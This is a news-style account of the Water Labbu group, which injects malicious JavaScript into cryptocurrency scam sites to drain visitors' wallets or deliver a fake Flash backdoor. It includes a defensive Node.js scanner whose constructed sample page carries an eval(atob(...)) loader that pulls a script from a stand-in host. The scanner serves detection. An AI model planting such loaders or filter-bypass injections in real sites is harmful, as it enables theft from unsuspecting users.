While some attackers were building cryptocurrency scam sites, others were learning how to hack them. One example is the Water Labbu gang, whose members break into fraudulent websites and inject their own malicious JavaScript into the sites' HTML.
The group never comes into contact with the victims and leaves all of the social engineering to the scammers. According to analysts, Water Labbu hacked at least 45 scam websites and made about $316,000.
After analyzing one of the hacked sites, experts discovered that the group had injected an IMG tag to load malicious Base64-encoded JS code using the “onerror” event, thereby bypassing XSS filters.
The injected code creates a script element that downloads a second script from the attackers' server. That second script collects Tether (USDT) and Ethereum wallet addresses and their balances.
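The injection technique described above (an IMG tag whose onerror handler decodes Base64 and bolts a remote script onto the page) is something a site owner can look for in their own served HTML. The scanner below is an added example written for this page, not code from the article or from any vendor report; it assumes Node.js with no extra dependencies, and the sample page, the reserved `example.invalid` host and the detection labels are all constructed for the demonstration.

```javascript
// Added example, not from the article: a defensive scanner for <img> tags whose
// onerror handler decodes a Base64 blob and evaluates it or creates a <script>
// element that loads a remote file. Runs under Node.js with no dependencies.

const IMG_TAG = /<img\b[^>]*>/gi;
const ONERROR_ATTR = /\bonerror\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i;
// A run of Base64 characters long enough to hide code rather than a short token.
const BASE64_BLOB = /[A-Za-z0-9+/]{24,}={0,2}/;
// Calls that turn a string into code or attach a script tag to the document.
const DYNAMIC_CODE =
  /\batob\s*\(|\beval\s*\(|\bnew\s+Function\b|createElement\s*\(\s*['"]script['"]\s*\)/;

// Returns one finding per suspicious <img>, each with the tag text and the
// reasons it was flagged. Tags with no onerror handler are never reported, and a
// handler that only swaps in a fallback image produces no finding.
function scanHtml(html) {
  const findings = [];
  for (const tag of html.match(IMG_TAG) || []) {
    const m = tag.match(ONERROR_ATTR);
    if (!m) continue; // plain image, nothing to judge
    const handler = m[1] ?? m[2] ?? m[3] ?? '';
    const reasons = [];
    if (DYNAMIC_CODE.test(handler)) reasons.push('handler-evaluates-code');
    const blob = handler.match(BASE64_BLOB);
    if (blob) {
      reasons.push('base64-blob-in-handler');
      // Decode and inspect the hidden payload; Buffer skips invalid characters.
      const decoded = Buffer.from(blob[0], 'base64').toString('utf8');
      if (DYNAMIC_CODE.test(decoded)) reasons.push('decoded-blob-loads-script');
    }
    if (reasons.length) findings.push({ tag, reasons });
  }
  return findings;
}

// Constructed sample page: an ordinary image, a legitimate onerror fallback,
// and one injected tag whose decoded payload loads a script from a reserved
// .invalid host (constructed for the demo, not an indicator from the article).
const INJECTED_LOADER = Buffer.from(
  "var s=document.createElement('script');s.src='https://example.invalid/loader.js';document.head.appendChild(s);",
  'utf8'
).toString('base64');

const SAMPLE_HTML = `
<html><body>
<img src="logo.png" alt="logo">
<img src="banner.png" onerror="this.src='fallback.png'">
<img src="x" onerror="eval(atob('${INJECTED_LOADER}'))">
</body></html>`;

// Scans the constructed page; expected to flag only the injected tag.
function demo() {
  return scanHtml(SAMPLE_HTML);
}

console.log(JSON.stringify(demo(), null, 2));
```

Decoding the blob before judging it is the point of the example: the outer handler may look like a one-line `eval(atob(...))`, and only the decoded text shows that it creates a script element pointing at a third-party host. Running this over the HTML a site actually serves (rather than its source in version control) is what catches a post-compromise injection of this kind.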
If the victim's balance exceeds 0.005 ETH or 22,000 USDT, Water Labbu starts the attack by determining the target's OS (Windows, Android or iOS). From there, one of two scenarios follows:
- The victim has a mobile device. The malicious script sends a transaction approval request through a dApp (decentralized application) that pretends to be the scam site. If the victim approves the transaction, the malicious script collects all the funds from the target's wallet and sends them to the Water Labbu wallet;
- The victim has a Windows device. In this case, the hacked sites show a fake Flash Player update notification overlaid on the scam site. By agreeing to the “upgrade”, the target is actually downloading the backdoor. This backdoor is used to steal crypto wallet data and cookies from the victim's device.
Whichever path is taken, the outcome for the victims is the same: the loss of all their cryptocurrency. The money simply goes to Water Labbu instead of to the creators of the scam site.